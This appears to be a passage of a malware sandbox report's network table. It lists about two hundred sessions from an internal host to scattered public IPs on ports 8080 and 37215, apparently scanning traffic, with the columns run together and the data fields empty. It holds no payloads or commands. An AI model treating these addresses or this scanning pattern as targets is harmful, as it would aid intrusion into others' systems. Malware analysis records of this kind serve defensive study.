                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19299192.168.2.234120069.64.167.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19300192.168.2.2350510208.194.226.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19301192.168.2.2356788142.46.137.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19302192.168.2.2344572169.48.188.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19303192.168.2.2339942209.194.80.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19304192.168.2.235799213.18.93.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19305192.168.2.235255020.235.255.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19306192.168.2.235341449.118.211.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19307192.168.2.234786498.172.241.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19308192.168.2.2348834182.111.17.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19309192.168.2.2340648191.236.223.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19310192.168.2.233811663.217.209.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19311192.168.2.2360702126.223.23.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19312192.168.2.233466291.33.140.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19313192.168.2.2349788171.75.11.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19314192.168.2.23555702.114.75.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19315192.168.2.234474699.92.217.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19316192.168.2.2354916218.60.227.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19317192.168.2.2333884173.233.5.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19318192.168.2.235073423.72.26.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19319192.168.2.2347062206.153.33.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19320192.168.2.2353750139.249.178.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19321192.168.2.2356826172.123.251.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19322192.168.2.2343234135.57.40.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19323192.168.2.2355422138.203.147.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19324192.168.2.233641664.134.137.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19325192.168.2.233557466.22.215.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19326192.168.2.2337886194.134.0.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19327192.168.2.233574425.77.197.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19328192.168.2.234506498.10.102.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19329192.168.2.2353796100.222.250.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19330192.168.2.233484287.196.136.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19331192.168.2.234610862.103.160.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19332192.168.2.2340006109.240.161.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19333192.168.2.2360288156.98.33.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19334192.168.2.23584964.201.155.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19335192.168.2.234423654.101.251.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19336192.168.2.2341204163.160.192.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19337192.168.2.2344212178.66.4.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19338192.168.2.2351262108.212.8.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19339192.168.2.2341626139.186.119.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19340192.168.2.2356876191.109.235.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19341192.168.2.233683099.205.192.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19342192.168.2.2348292166.28.250.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19343192.168.2.2344460140.101.134.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19344192.168.2.2351538194.29.68.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19345192.168.2.2336016135.86.16.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19346192.168.2.2353468191.228.100.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19347192.168.2.2354996126.229.110.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19348192.168.2.2350356198.115.77.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19349192.168.2.23500541.95.125.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19350192.168.2.2344158206.12.132.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19351192.168.2.2345190147.112.76.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19352192.168.2.2360768144.217.114.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19353192.168.2.234893887.32.234.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19354192.168.2.2360224126.68.101.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19355192.168.2.23337501.34.120.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19356192.168.2.235716869.215.24.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19357192.168.2.2333536210.51.68.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19358192.168.2.2347390115.189.55.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19359192.168.2.2339708187.43.4.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19360192.168.2.235566097.70.79.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19361192.168.2.2342386118.210.35.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19362192.168.2.234332276.41.8.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19363192.168.2.2351480116.57.22.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19364192.168.2.2359458185.5.138.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19365192.168.2.233517017.155.54.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19366192.168.2.2344436119.78.216.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19367192.168.2.2333256164.2.182.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19368192.168.2.2355240145.54.43.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19369192.168.2.2344076118.64.211.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19370192.168.2.233280831.73.229.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19371192.168.2.2356742160.168.113.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19372192.168.2.2351756155.64.182.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19373192.168.2.2356118133.205.109.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19374192.168.2.233478235.13.193.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19375192.168.2.2360318139.74.82.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19376192.168.2.234747099.225.199.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19377192.168.2.2334318220.185.48.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19378192.168.2.233878663.216.133.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19379192.168.2.235779888.69.70.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19380192.168.2.2333580223.17.99.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19381192.168.2.236066432.170.122.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19382192.168.2.2344244178.26.23.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19383192.168.2.2338726132.10.56.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19384192.168.2.2341374115.127.181.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19385192.168.2.2337812120.21.235.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19386192.168.2.235531223.211.94.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19387192.168.2.234313645.212.70.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19388192.168.2.2354448183.21.44.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19389192.168.2.2356314122.239.59.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19390192.168.2.234161214.146.201.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19391192.168.2.2358828124.66.122.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19392192.168.2.235939424.56.200.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19393192.168.2.2346030130.156.95.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19394192.168.2.2334250208.239.115.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19395192.168.2.2341334109.17.171.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19396192.168.2.2341048157.101.12.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19397192.168.2.2333462196.201.202.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19398192.168.2.234279823.228.215.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19399192.168.2.23547702.170.179.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19400192.168.2.2339134101.10.82.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19401192.168.2.2344256149.178.35.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19402192.168.2.2346304156.38.1.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19403192.168.2.2360928179.69.211.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19404192.168.2.2345182159.20.12.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19405192.168.2.233963253.96.238.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19406192.168.2.235820271.21.150.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19407192.168.2.2338440124.139.43.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19408192.168.2.2354880213.244.234.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19409192.168.2.2352420207.65.248.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19410192.168.2.234651065.238.188.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19411192.168.2.233497648.140.121.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19412192.168.2.2335612102.189.162.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19413192.168.2.2333790122.231.0.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19414192.168.2.23410164.151.143.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19415192.168.2.2345344222.188.101.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19416192.168.2.235098483.53.153.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19417192.168.2.2348410123.130.78.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19418192.168.2.2335968212.54.120.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19419192.168.2.2345708108.130.200.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19420192.168.2.23416084.193.232.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19421192.168.2.235681278.93.133.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19422192.168.2.235321219.98.243.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19423192.168.2.236009677.129.189.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19424192.168.2.2334820206.192.29.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19425192.168.2.2347180183.182.89.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19426192.168.2.2342538221.97.193.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19427192.168.2.2335176189.7.115.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19428192.168.2.2360312121.249.196.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19429192.168.2.2335960133.101.253.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19430192.168.2.23570602.215.207.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19431192.168.2.2346344136.240.38.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19432192.168.2.233487614.54.101.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19433192.168.2.234592897.1.161.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19434192.168.2.2358082181.213.245.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19435192.168.2.2342100157.67.250.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19436192.168.2.2357274200.135.47.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19437192.168.2.236059641.151.228.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19438192.168.2.2337346157.196.170.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19439192.168.2.2345814157.109.224.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19440192.168.2.2341320197.58.44.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19441192.168.2.2344158157.88.237.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19442192.168.2.2349532118.88.244.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19443192.168.2.234478843.179.221.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19444192.168.2.235656841.243.122.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19445192.168.2.2360056157.37.196.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19446192.168.2.2342058157.222.80.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19447192.168.2.2332962157.140.57.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19448192.168.2.234712641.188.159.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19449192.168.2.233404841.10.78.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19450192.168.2.2357598197.218.197.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19451192.168.2.2332924197.67.97.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19452192.168.2.2344832182.74.88.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19453192.168.2.2334186197.157.164.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19454192.168.2.2334050197.240.242.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19455192.168.2.235760841.112.166.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19456192.168.2.233663041.233.81.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19457192.168.2.2360508197.211.2.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19458192.168.2.234590441.222.51.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19459192.168.2.2346986179.159.224.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19460192.168.2.233619441.48.188.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19461192.168.2.2337104107.215.133.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19462192.168.2.236031895.255.222.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19463192.168.2.2360154197.168.212.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19464192.168.2.236046641.97.24.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19465192.168.2.2336918131.228.228.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19466192.168.2.235431874.223.83.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19467192.168.2.2340196157.192.197.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19468192.168.2.234516041.43.157.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19469192.168.2.2346882197.6.158.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19470192.168.2.2345270157.126.126.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19471192.168.2.2360172197.58.247.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19472192.168.2.2345762173.193.129.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19473192.168.2.2356018197.243.192.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19474192.168.2.2359370197.81.173.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19475192.168.2.2337774197.190.158.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19476192.168.2.233580283.65.134.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19477192.168.2.2337160197.180.11.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19478192.168.2.2336136197.199.99.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19479192.168.2.2336618157.233.239.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19480192.168.2.235627841.13.12.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19481192.168.2.2349574157.127.197.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19482192.168.2.2333142212.251.39.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19483192.168.2.235359641.128.66.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19484192.168.2.2352446157.178.114.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19485192.168.2.2354942197.29.99.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19486192.168.2.2356558210.25.139.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19487192.168.2.2335260197.208.234.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19488192.168.2.233652441.253.94.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19489192.168.2.2342672157.24.45.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19490192.168.2.2350346157.42.119.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19491192.168.2.2349262216.180.45.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19492192.168.2.235160241.98.108.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19493192.168.2.235180875.24.205.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19494192.168.2.2357706157.96.190.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19495192.168.2.233989841.160.162.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19496192.168.2.2332890157.203.144.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19497192.168.2.236098041.34.77.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19498192.168.2.234186041.35.200.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19499192.168.2.2357206197.137.198.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19500192.168.2.2347654185.137.186.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19501192.168.2.234754241.245.33.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19502192.168.2.234564841.161.117.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19503192.168.2.2337718146.208.176.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19504192.168.2.235684841.11.204.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19505192.168.2.2338532157.220.133.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19506192.168.2.234107882.141.173.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19507192.168.2.2336574197.1.134.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19508192.168.2.23412564.116.250.24437215
                                                        TimestampBytes transferredDirectionData


